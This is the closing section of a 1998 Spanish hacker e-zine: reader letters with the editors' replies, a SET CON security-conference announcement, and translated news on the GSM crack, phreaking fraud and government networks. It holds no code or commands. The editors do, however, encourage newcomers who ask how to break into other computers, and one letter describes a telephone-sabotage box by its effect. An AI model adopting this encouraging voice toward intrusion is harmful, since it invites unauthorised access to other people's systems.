Date: Wed, 20 May 1998 07:34:44 GMT From: "David Gallego Laredo" Subject: listado unfrateful.java EN PRIMER LUGAR ME GUSTARIA FELICITAROS POR VUESTRO E-ZINE, ES EL MEJOR QUE HE LEIDO HASTA EL MOMENTO EN CASTELLANO, SOY UN AFICIONADO AL HACK Y DESEARIA COMENTAROS UN PROBLEMA QUE ME HA SURGIDO CON UNO DE LOS LISTADOS EN JAVA PUBLICADOS EN VUESTRO CUARTO E-ZINE. EN CONCRETO SE TRATA DEL "UNGRATEFUL.JAVA" EN EL CUAL MEDA UN ERROR AL COMPILARLO CON EL VISUAL J++ 1.1. EL ERROR ES EN LA INSTRUCCION: ErrorMessage err = new ErrorMessage(); ME DICE QUE NO HE DEFINIDO LA CLASE ErrorMessage. NO SE NADA DE JAVA DE MOMENTO, Y ESPERO ME PODAIS HECHAR UNA MANO PARA QUE ESTE PROGRAMA FUNCIONE Y PODER PROBARLO Y ESPERIMENTAR UN POCO CON EL. ESPERO NOTICIAS VUESTRAS, GRACIAS Y HASTA OTRA. <------> [ Pues definela ;-) por ejemplo, pero lo mejor es que pilles algun libro o busques algun curso de Java por la Red, que te pueda ayudar. Thx por los cumplidos :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Sat, 23 May 1998 23:43:47 GMT From: Edgardo Mayer Subject: INFO Podrmas darme direcciones de E-mail de colegas-hackers argentinos. Busco sean argentinos por la parte de la telefonma se refiere(phreakers). Gracias y ixitos Edgardo <------> [ Pues nosotros no conocemos ningun phreaker o hacker argentino, pero si alguien lo es, que nos envie un mail y os pondremos en contacto, okis ? ;-) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "raul diaz" To: jjf_team@usa.net Subject: Saludos...!!! Antes que nada los felicito por su pagina, son muy interesantes los temas que ahi describen... f e l i c i d a d e s . . . ! ! ! Les escribe un fiel aficionado a los hackers, pero apenas soy un bebe en esto, por eso les escribo para pedirles que hechen una mano, y me ense¤en a hacer esto... Donde yo trabajo, hay una gran red de tipo T1, espero me puedan mandar algo de informacion para hacer algo por aca.... Tambien quisiera (si no es mucha molestia) que me enseñaran desde lo basico, como les digo soy un fiel aficionado y me fascina esto... Como ustedes dicen: La informacion viaja y es libre.... (claro sin da¤ar a nadie). Bueno, espero me contesten..... atte: Un ser al que le gusta la superacion.... Slash. ;-) <------> [ Thx :) pero como siempre nuestro consejo que es leas este ezine con mucha atencion y experimentes por tu cuenta. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Tue, 26 May 1998 22:18:36 GMT From: cubikice@xxxxxxxxxxxxxx To: jjf_team@usa.net Subject: Holas!! estoy vivo!! :-) Hola!! Queria responderos al mail que me enviasteis hace + o - una semana en la que me deciais que ibais a publicar mi articulo y nada, que queria daros las gracias, estoy preparando otro articulo, este de mi cosecha aunque no se si os lo llegare a enviar, lo veo un tanto verde El caso es que ahora mi placa base se la he tenido que dejar a mi novia :-) total que estoy tirando de 486 y no puedo enchufar mis HD's de siempre asi que os envio esto desde la web y con el LYNX, joder! (y es que tampoco tengo CD-ROM), total que voy con un Linux descafeinado y totalmente desconfigurado, menos mal que aun asi voy haciendo cosillas. Bueno, no os pego mas la paliza, vais alguna vez por el IRC? me gustaria chtear un rato con alguno de vosotros algun dia. Pues nada, eso es todo. Un saludo!! cubikice@xxxxxxxxxxxxxx <------> [ Okis, y estamos esperando ese arti :) siempre puede ser util para alguien y eso es lo que pretendemos en este ezine. Sobre lo de IRC, pues no, ya que no nos interesa mucho. Para estar en contacto con nosotros pues E-mail :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Fri, 29 May 1998 20:51:46 GMT From: RAFAEL TREJO OLVERA To: jjf_team@usa.net Subject: Zic Hola quisiera que me ayudaran para poder ser un hacker. Mi e-mail es Zic97@xxxxxxxxxxxxxx De cualquier manera mandemen informacion sobre hackers o programas. y les pido la direccion de un chat de hackers. <------> [ Pues como ya hemos repetido tantas veces lee este ezine y nosotros no podemos enviar nada a nadie, okis ? #hacker #hack #hack_novatos #hackers #hack_the_world #hackgov ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Wed, 27 May 1998 13:23:08 GMT From: Liang Xiao Zhu To: conde_vampiro@usa.net Subject: Un saludo Hola conde vampiro, quiero que me ense¤es como entrar al ordenador de otra persona. No voy ha hacer nada ilegar solo soy cybernauta que quiere aprender algo mas, gracias. <------> [ Pues como siempre decimos no damos clases privadas y YA ESTA BIEN DE RECIBIR ESTE TIPO DE MAIL'S, OKIS ? Para eso tienes vuestro/nuestro ezine. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Date: Thu, 04 Jun 1998 04:32:33 GMT From: "Damian Broy" To: jjf_team@usa.net Subject: sugerencia..... Hola muchachos, visite su page en la red y me percate de que en la seccion de boxes hay un error en la Blotto Box. Esta solo sirve para paralizar (o hacer mierda, anyway) toda una zona correspondiente a un prefijo de caracterisitica telefonica, por medio del simpatico envio de un gran flujo electrico a travez de la linea telefonica. Espero haber sido util y los felicito por su pagina, si mi interpretacion fue considerada erronea por uds pido disculpas. suerte!!!!!! Cook2. Damian Broy dbroy@xxxxxxxxxxxxxx <------> [Thx por la informacion. Prometemos cambiarlo lo antes posible. Y no te preocupes, tu interpretacin es correcta, cualquiera puede tener fallos :-) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ------------------------ - NOTICIAS UNDERGROUND - ------------------------ - J.J.F. / HACKERS TEAM - <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> I JORNADAS SOBRE SEGURIDAD EN LAS NUEVAS TECNOLOGIAS 14, 15 y 16 de Agosto Madrid _ _ _ _ _ _ _ _ _ _.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-.._ Durante mucho tiempo hemos notado la falta de unas jornadas de estas caracteristicas, en las que se acercara a la gente de a pie los aspectos man interesantes de la seguridad informatica y las telecomunicaciones. Por primera vez en España queremos organizar estas jornadas que den pie a la realizacion de otras muchas y que esperamos tengan su continuidad en proximos años. Para eso contamos con el respaldo oficial de la asociacion de estudiantes ACD, a la que desde ya agradecemos su participacion y esperamos contar con ellos en las futuras ediciones de SET CON -[ QUE ES SET CON ]- SET CON no es ni mas ni menos que una reunion de gente interesada en los temas de seguridad en redes, seguridad informatica, programacion, comunicaciones... Para estas primeras jornadas disponemos de un ciclo de conferencias, nuestra Secure Party, proyecciones de video, concursos, y el resto de actividades que se nos vayan ocurriendo. Para ello, necesitamos de vuestra colaboracion. -[ CONFERENCIAS ]- En un principio estan previstas tres conferencias o debates por dia, exceptuando el domingo, en el que solo habra una conferencia. En el momento de escribir este anuncio tenemos preparadas estas conferencias: * "Seguridad en Windows NT" Conferencia en la que Chessy nos hablara del sistema operativo Windows NT. * Legislacion y delito informatico * Virus Posible participacion de Anyware y Panda. Nos gustaria que la gente del 29A tambien participase. * ... Los que esteis interesados en participar en alguna conferencia o alguna mesa redonda, escribid a , indicando claramente sobre que quereis hablar, que dias teneis disponible, y cual es vuestro nombre. -[ CAMPEONATOS ]- Para demostrar nuestros conocimientos o simplemente pasar un buen rato, con la posibilidad de importantes premios. { Trivial Security Edition } Que decir sobre este entretenido juego de toda la vida. Pon a prueba tus conocimientos en los mas diversos temas como criptografia, sistemas operativos, protocolos, lenguajes de programacion, telefonia o hardware. Quien sera el ganador??? { Campeonato de Quake } Nada que ver con la seguridad, pero si con pasar un buen rato. Simplemente por eliminacion, a ver quien es el mas violento, el mas listo, el mas... Quake { Barricada } El campeonato mas interesante de todos. Coge tu equipo y conectalo a la red barricada. Lo unico que tienes que hacer es conseguir que tu ordenador mantenga un servidor HTTP (puerto 80), servidor de correo y servidor de FTP. Pero eso no es todo. A cada participante se le suministrara un archivo, que tendra el mismo nombre para todo el mundo y debera estar en el mismo directorio, aunque el contenido no sera el mismo. No ganara el que mas tiempo este operativo. Tampoco sera el que obtenga mas archivos ajenos. Sera el que consiga ambas cosas a la vez. { Gymkana } El ultimo dia se realizara una gymkana en los alrededores del local de las Jornadas. Se trata de demostrar que tambien tenemos algo de fisico ;) Habra pruebas tradicionales como el lanzamiento de discos duros (si alguien los presta), o el de diskettes, hasta pruebas nuevas como determinar la informacion de una tarjeta perforada... por el tacto -[ PREMIOS ]- Parte de los premios pueden salir de donaciones. Asi que esperamos vuestro apoyo en este aspecto. Personalmente considero como un gran premio la obtencion de un speccy original ;) -[ PROYECCIONES ]- Durante las jornadas se proyectaran peliculas que hayan tenido o tengan algo de importancia dentro del mundo de la seguridad informatica. Seran peliculas como "Juegos de Guerra", "Fisgones" y hasta incluso "Hackers" (Alguna habra que criticar, no? ;) ) -[ MISC ]- Quedan por resolver temas de alojamiento, transporte, horarios. Permaneced atentos a la pagina de SET (http://www.geocities.com/SiliconValley/8726), sonde apareceran los proximos anuncios y el enlace a la pagina de la SET CON 98. Para cualquier tipo de duda o colaboracion, escribid a Have P/Hun Falken <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> CRACKEADO EL ALGORITMO DE LOS TELEFONOS DIGITALES (GSM). Investigadores crackean el codigo de los Telefonos Celulares por John Markoff San Francisco - En un logrado intento de crack un conocido metodo de encriptacion para prevenir la clonazion de los telefonos digitales moviles, un grupo de investigadores informaticos de la Universidad de California creen que tiene importantes evidencias que el sistema empleado por los telefonos es deliberadamente debil para permetir la vigilancia del gobierno. El metodo crackeado es conocido como GSM (Groupe Speciale Mobile). El sistema de encriptacion mas usado en el mundo para los telefonos celulares, el GSM es usado en unos 80 millones de aparatos alrededor del mundo y al menos unos 2 millones de telefonos en los Estados Unidos. Mas de los 58 millones de telefonos analogicos y digitales americanos estan basados en una variedad de otros metodos, pero 20 compa¤ias americanas dedicacas a telefonia digital celular incluidas Pacific Bell, una division de SBC Communications, y Omnipoint corp. utilizan el estandar GSM. Dos investigadores de la Universidad Californiana Berkeley anunciaron el pasado Lunes que ellos havian logrado romper el metodo GSM usando un ordenador para determinar el numero secreto guardado en el Subscriber Identify Module (SIM), una especie de tarjeta de credito dentro del telefono. Si los criminales pudiesen crackear el metodo, ellos podrian clonar los telefonos protegidos mediante encriptacion GSM, para ello, tendrian que detectar un numero de un telefono y usarlo en otro telefono para fradulentar las llamadas. Por otro lado, los investigadores y los representantes de las compa¤ias telefonicas celulares dijeron el Lunes que el uso de la clonacion era remota en comparacion con la vulneravilidad de los telefonos analogicos celulares. Por una cosa en concreto, ya que dijeron, que para crackear el GSM se requiere al menos unas 10 horas de pruebas electronicas y la utilizacion de maquinas muy potentes. Lo que era mas intrigante todavia que el hecho de la seguridad, era que crackeando el codigo se descubrio que el llave digital usada en los GSM posiblemente fue manipulada durante el proceso de dise¤o para permitir a las agencias gubernamentales espiar las conversaciones celulares. Aunque la llave. conocida como A5, es un sistema de encriptacion de 64 bit, generalmente un codigo dificil de crackear, los investigadores han determinado que los ultimos 10 digitos eran actualmente ceros. Esto significa que con potentes ordenadores, sistemas utilizados por las agencias de inteligencia gubernamentales, puede ser posible decodificar una conversacion telefonica rapidamente, explica Marc Briceno, director de la Smartcard Developers Association, una peque¤a organizacion de programadores. "Aparemente la llave se debilito intencionadamente", dice. "Y no puedo pensar en ninguna razon para hacer esto intencionadamente". Durante los ultimos a¤os, la industria informatica esta plagada de rumores sobre que las agencias gubernamentales han forzado o persuadido a los desarrolladores de cripto sistemas a implementar debilidades matematicas en los sistemas de seguridad o incluso puertas traseras. Algunos de estos rumores hablan sobre la N 1005 SA (National Security Agency) o la CIA (Central Intelligence Agency) que teniendo ellos mismos criptografos, dise¤ando programas criptograficos para ellos mismos y despues lo liberan, para asegurarse que ellos pueden decodificar datos informaticos o conversaciones telefonicas. Algunos rumores han cogido importancia, en parte, sobre el autentico origen del sistema GSM. Expertos criptografos dicen que las primeras formulas matematicas, o los algoritmos, en el sistema criptografico GSM proviene originalmente de Alemania o Francia como parte de una creacion sobre un estandar en los a¤os 1986 y 1987. "Es imposible esto hacer esto, por lo que debe haber otras razones", alega Stewart Baker, un abogado de Washington que fue antiguamente abogado de la NSA. La NSA es una de las agencias mas acusadas de sospecha debido en mayor parte ya que su mision es interceptar llamanadas telefonicas. "La especulacion es facil, y nunca muere", dice. Aunque, muchos expertos de la industria no pueden pensar en una buena razon de porque un algoritmo encriptador debe ser debilitado intencionadamente, otra razon que para permitir la vigilancia. "Esto a sido debilitado intencionadamente", dice Phil Karn, un ingeniero de la Qualcomm Inc., una compa¤ia de telefonia celular que ha desarrollado un estandar alternativo al GSM. "Quien crees que esta interesado en hacer una cosa como esa?". La debi llave fue descubierta por dos investigadores. Ian Goldberg y David Wagner, ambos miembros de la universidad de California en el grupo de Aplicaciones de Seguridad en Internet, Autentificacion y Criptografia en Berkeley. Ellos hicieron hincapie en que habian detectado facilmente el fallo de seguridad que permite clonar los telefonos celulares. La industria de la telefonia celular es consciente del fallo en los GSM pero dice que realmente a reforzado su justificacion en la seguridad de los telefonos digitales. "Me quito el sombrero antes estos muchachos, han hecho un magnifico trabajo," dice George Schimtt, presidente de la Omnipoint. "Yo les daria credito, pero no estamos en peligro de fraude." Los investigadores y la Smartcard Developers Association dicen que el exito del ataque se debe a las nuevas evidencias de las practicas de la industria a esconder las tecnicas de seguridad del publico. La autentica seguridad, ellos alegan, requiere la publicacion de los algoritmos para que expertos independientes puedan verificar la fuerza del sistema. "Esto demuestra otra vez un fallo en un proceso de dise¤o cerrado." dice Briceno. "Estas compa¤ias se privan ellos mismoa de la seguridad, pero ahora las gallinas han llegado a casa para freirse". Link's Relacionados: Another GSM crack info page at http://www.isaac.cs.berkeley.edu/isaac/gsm-faq.html The GSM algorithm, COMP128 can be seen in a C program source code at the SmartCard Developers Association Web site at http://www.scard.org/gsm/a3a8.txt European Telecommunications Standard Institute main page at http://www.etsi.fr/ Info about SIM at http://www.etsi.fr/brochures/stateart/vedder.htm <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> HACKERS DEL SERVICIO SECRETO INCAPACES DE CRACKEAR UNA INTRANET. PA 4/21/98 11:06 AM By Giles Turnbull, PA News Hackers profesionales del servicio secreto fueron pillados en un intento de hackear el sistema de comunicaciones interno de seguridad del Gobierno, que fue puesto en marcha hoy mismo. Durante el desarrollo y planificacion de la Intranet, gente del GCHQ y otros organismos de seguridad similares tambien fueron pillados en un intento de hackear el sistema Pero ellos fallaron. Por otro lado, el ministro encargado del projecto admitio hoy que mirando los hackeos en los sistemas del Pentagono y de la Nasa en los EE.UU., el no puede decir que la nueva Intranet sea imposible de crackear. La Intranet Segura del Gobierno, The Goverment Secure Intranet (GIS), permitira a los ministros y gente del gobierno a comunicarse mediante e-mail y usar la herramienta cotidiana del Gobierno, conocida como Agenda. Una Intranet es un sistema de Internet cerrado que solo puede ser accedido por ciertas personas. Es un metodo muy popular en grandes compa¤ias y organizaciones para sus comunicaciones internas. La primera fase del GIS, lanzada hoy, estara disponible para unas 400 personas que tiene permiso para ver documentos clasificados. La segunda fase, dentro de algunos meses, sera vista por unas 400,000 personas y se incluiran documentos confidenciales. Nada clasificado como secreto sera puesto en la Intranet, dice el ministro en el cargo David Clark, Canciller del Ducado de Lancaster. Dr Clark dice que el comienzo del sistema a sido crucial para el futuro de un gobierno electronico. "Esto a sido el comienzo del futuro sistema de funcionamiento del gobierno", alega. "Es una revolucion en el modo de hacer gobierno. Cuando llege al cargo hace un a¤o yo estaba sorprendido de que no havia nada sobre seguridad electronica en las comunicaciones de los diferentes departamentos. "Muy pronto en el desarrollo del sistema invitamos a dos grupos de Hackers del gobierno y les ofrecimos el reto de hackear el sistema. Incluso les contamos como funcionaba pero aun asi no consiguieron romper la seguridad". "Estoy muy seguro de que sera muy, muy dificil tal vez, pero no imposible, romper la seguridad" a¤ade Dr Clark. El GIS fue inagurada hoy en 6 departamentos del Gobierno, y la segunda fase empezara dentro de 6 semanas. Otros departamentos estan esperando para unirse en los proximos meses. <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ATAQUE HACKER DURANTE EL CHAT DE YELTSIN. MOSCOW, May 13 Los rusos dicen que han detenido 20 intentos de dejar desconectados los servidores de Moscu. Las autorirades rusas dicen de haber detenido unos 20 intentos por Hackers de desconectar el ordenador en el cual el presidente Boris Yeltsin estaba usando para su primera charla en Internet en MSNBC. La agencia de noticias entrevisto a un official de la Agencia Federal para las Comunicaciones e Informacion Gubermental, Federal Agency for Goverment Communication and Information (FAPSI) diciendo que los Hackers intentaron desconectar el servidor, refiriendose a la red gubernamental que provee el intercambio de mensajes entre Yeltsin e Internet. Chris Donohue, quien estuvo media hora en la sesion de chat en MSNBC, dijo que no a havido aparentemente ningun asalto en los servidores de la compa¤ia, los cuales usan ingles para responder y preguntar. "Nuestro servidor funciono perfectamente, y ningun ataque fue notificado por nuestro equipo", dice. Donohue dice que alrededor de unas 4000 personas se unieron al chat. Los representantes del FAPSI alegan que unos 22,000 usuarios de Internet visitaron el servidor de chat. La charla se fue desplazando hacia las nuevas leyes en las politicas de Moscu. Pero algunos navegantes del web aprendieron sobre las preguntaron qye le hacian a Yeltsin que su estado de salud es bueno en estos momentos, que nunca ha fumado un cigarro, y que su estilo de pelo se debe a la mujer de su vida y no por un pasado Irlandes y ademas dijo que no creia que Rusia este preparada para una mujer presidente. El FAPSI dijo que antiguamente sus lineas eran faciles de hackear mediante aparatos electronicos de alta tecnologia y sistema criptograficos. Varios Hackers adolescentes de diferentes paises, incluidos Rusia, han sido acusados de recientes asaltos a los sistemas informaticos del Pentagono en los EE.UU. y otras redes militares alrededor del globo. <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> AUSTRALIA: MILLONES EN PERDIDAS POR CULPA DE LOS PHREAKERS. 14 May 98 By ANDREW PROBYN. Millones de dolares estan siendo robados de los usuarios de telefonos en Australia debido a phreakers que utilizan elaborados scaners telefonicos. Viviendas, empresas y usuarios de telefonos mobiles estan siendo victimas de un gran y sistematico fraude telefonico. Las empresas Telstra y Optus han hecho avances en proteger sus redes de telecomunicaciones, pero los Hackers han incrementado sus entradas en la red para robar los codigos de los usuarios. El Herald Sun ha descubierto muchos casos en los cuales los Hackers eran acusados de estos actos, incluidos una vivienda que tiene una factura en llamadas por $10,000 que el niega haber hecho. Una investigacion del Herald Sun revela que: Llamadas eroticas en los Estados Unidos, la Guyana, la Republica Dominicana, Rusia y Chile son generalmente mamipuladas para aparecer en otras cuentas telefonicas. Los Hackers pueden manipular sus llamadas en Internet, locales e internacionales para que no sean detectadas. Las empresas con centralitas internas, PABX, son particularmente vulnerables y son frecuentementes usadas por los Hackers. Los telefonos mobiles aunque sus mecanismo de seguridad pueden ser clonados usando su tarjeta SIM, el chip ID que controla la factura. Wally Rothwell, representante de la industria de las telecomunicaciones, dice que el hacking se ha vuelto una costosa realidad. "El hacking le puede costar a los cosumidores unos millones de dolares," dice. "Algunas de estas llamadas son muy caras - llamadas eroticas, por ejemplo, puede costar solo $30 el ya conectar." Durante Enero y marzo de este a¤o, viviendas y peque¤as empresas niegan haber hecho esas llamadas. Mr Rothwell dice que esto es "phreaking" - un faude en el cual el coste de las llamadas son dirigidas hacia otro usuario - y ha sido probado en las centralitas. "Por otro lado, tenemos que comprobar si el hacking se puede hacer remotamente o desde fuera de la centralita de telefonos." Pero un experto phreaker conto al Herald Sun que los Hackers establecieron hace algunos a¤os ya como realizar llamadas ilegales en las centralitas desde lineas externas. "Cuando yo hacia esto usaba mi ordenador para programar la centralita para hacer lo que yo quisiera que hiciese," dice Mr Dedio. "Los phreakers expertos suelen usar lineas normales y ordenadores de sobremesa para generar ciertos sonidos para abrir la centralita" dice. El dice que los Hackers tambien acceden a las lineas privadas manipulando los pitidos de las centralitas en las calles. Ellos pueden facilmente dirigir llamadas hacia los vecinos, dice, pero esto peligroso. "Si puedes meterte en una centralita no hace falta que robes la linea telefonica de alquien," dice. La figura principal del Queensland University of Technology's school of data comunications, el profesor Bill Caelli, dice que ni siquiera las sofisticadas redes estan a salvo. Muchas compa¤ias con sistemas PABX han sucumbido por los miles de millones en fraude telefonico en el Reino Unido, los Estados Unidos y Canada. Investigadores de la Universidad de Berkeley, California, el mes pasado probaron que los telefonos digitales ya no era seguros, clonando el chip SIM que controla la factura, dice. La Autoridad Australiana en la Comunicaciones dice que las grandes compa¤ias tiene que tener extremo cuidado. "Cuanto mas grande es la compa¤ia, mas grande es la factura y mas facil es para el Hackers esconderse," dice el representante Frank Nowlan. La pena maxima por phreaking es de cinco a¤os en prision bajo el Acta Federal de Crimenes. El relaciones de Telstra Stephen Nason dice que Telstra cree que su red de seguridad es la mas segura del mundo contra los Hackers. "Como ninguna red es 100% segura, nosotros creemos que la red de Telstra es muy segura," dice. El hacking no se esta expandiendo, dice, con probablemente unos 50 casos por a¤o en Australia. El relaciones de Optus Kristin Meagher dice que Optus no tiene evidencia alguna de hacking en sus redes. (C) 1998 Herald and Weekly Times Limited. HERALD SUN 14/05/98 P7 <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Bueno, pues aqui acaba el numero cinco y ademas tambien nuestro primer volumen, que visto los mail's recibios y haciendo balances de los articulos aportados por los lectores, pues ha gustado mucho. Por supuesto esto es solo el principio, pero esto no se podra conseguir ni no nos ayudais aportando articulos, okis? Pues esto acaba por hoy y esperamos oir de vostros, vuestras felicitaciones, quejas, criticas, articulos o actos de hack, pues escribe a nuestro buzon y si tiene miedo pues ya sabes usa nuestra llave publica PGP. Escribe!!!!!!! jjf_team@usa.net ADIOS Y HASTA EL SIGUIENTE NUMERO!!! - J.J.F. / HACKERS TEAM - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=